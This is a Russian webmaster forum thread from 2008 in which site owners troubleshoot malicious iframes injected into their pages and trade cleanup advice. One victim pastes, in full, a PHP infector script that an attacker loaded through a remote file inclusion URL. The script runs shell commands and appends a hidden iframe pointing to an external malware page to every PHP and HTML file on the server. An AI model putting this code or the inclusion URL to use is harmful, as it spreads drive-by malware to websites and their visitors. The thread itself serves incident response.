- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
давайте URL сайта, глянем... там может быть через javascript это быть, т.е. надо смотреть в documet.write, eval и т.д.
Большое спасибо! код уже удалил нашел где лежит пароль на фтп и т.д поменял
спасибо большое!
Большое спасибо! код уже удалил нашел где лежит пароль на фтп и т.д поменял
спасибо большое!
сгружали там вот это -> http://www.virustotal.com/ru/analisis/c086058d90260e44f1596562a6d3d1bb
Тут наверное и был этот вирус :)
_ttp://leohin.com/diamond/i/
This Account Has Been Suspended For Violation Of Hosting Terms And Conditions.
Не был, а есть.
То, что на странице написано Suspended, не означает что оно так и есть на самом деле ;)
Хостинг hostfresh.com, это похоже всем известный RBNetwork
вообещм удалил я ту строку ну типа с этим _ttp://leohin.com/diamond/i/
и все равно опять у меня антивирусник занюхал его! и люди уже все больше и больше пишут об этом!
everestrus добавил 09.04.2008 в 21:12
сгружали там вот это -> http://www.virustotal.com/ru/analisis/c086058d90260e44f1596562a6d3d1bb
то есть сюда заливать страницу на которой вирус находит?
вообещм удалил я ту строку ну типа с этим _ttp://leohin.com/diamond/i/
и все равно опять у меня антивирусник занюхал его! и люди уже все больше и больше пишут об этом!
everestrus добавил 09.04.2008 в 21:12
то есть сюда заливать страницу на которой вирус находит?
Перед тем как менять пароль на фтп нужно вирусы у себя поудалять для начала.
да вроде вирусов нету!
проблема думаю была вдругом
я удалил того леонида и больше вроди ничего не ненашел потом еще раз прочитал что вы писали и нашел то что писал dkameleon
а именно название в ссылке как бы на google а вовсе нет! было gooqle
и зашел я на сайт гугла посмотрел их код и точно не такой он!
так что вроди все пофиксилось пок ау меня не визжит!
всем большое спасибо
everestrus,
НЕ заходя на сайт
1. Идете, меняете пароли к FTP, при этом пароли нельзя хранить в файловых менеджерах или еще в чем, что использует подключение к вашему ФТП. Не сохранять нигде, короче.
2. проверяете машину при помощи NOD32 3.x версии и еще чем нибудь вроде Касперского.
3. Заходите на FTP, проверяете все index.* страницы (скорее всего только в них, но может и в других быть) и стираете оттуда эту гадость.
4. Радуетесь жизни.
Здравствуйте всем. Подскажите по возможности. Схожая ситуация, убиваю фрейм "HTML:Iframe-gen" (точно везде), меняю пароли, храню их в голове) и через день опять эта гадость сидит на сайте (ofmusic.ru). При чем прописывается в конфиг чаще и инклудные пхп, также на index. Пробую закрывать папку конфига аксесом order deny,allow,deny from all - все то же.
По логам отследили такой вход /mat/11/include/inc_ext/spaw/dialogs/table.php, spaw_root=http://www.trepamontes4x4.com/digi/menu?, а там
їХ-їХ (00:04:03 24/04/2008)
<?
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
if(!isset($_SERVER['DOCUMENT_ROOT']))
{
$n = $_SERVER['SCRIPT_NAME'];
$f = ereg_replace('\\\\', '/',$_SERVER["PATH_TRANSLATED"]);
$f = str_replace('//','/',$f);
$_SERVER['DOCUMENT_ROOT'] = eregi_replace($n, "", $f);
}
$codigo = "<IFRAME src=\"http://usuarios.arnet.com.ar/alvarezluque/morgan.html\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>\n";
$directorio = $_SERVER['DOCUMENT_ROOT'];
foreach (glob("$directorio/*.php") as $archivo) {
$fp=fopen($archivo,"a+");
fputs($fp,$codigo);
}
foreach (glob("$directorio/*.htm") as $archivh) {
$fp=fopen($archivh,"a+");
fputs($fp,$codigo);
}
foreach (glob("$directorio/*.html") as $archivl) {
$fp=fopen($archivl,"a+");
fputs($fp,$codigo);
}
?>
идет отсюда http://www.trepamontes4x4.com ,
при етом я обнаружил что инклюдиться <IFRAME src=\"http://usuarios.arnet.com.ar/alvarezluque/morgan.html\
Добавление в аксес "php_value allow_url_fopen 0" не дало эффекта. С сервера этих уродов стянул кучу скриптов, может противоядие какое из них придумать?) Либо радикально переписывать движок (самописный)?
может противоядие какое из них придумать?
переписывать движок (самописный)
Закрыть дырку в движке, если она одна.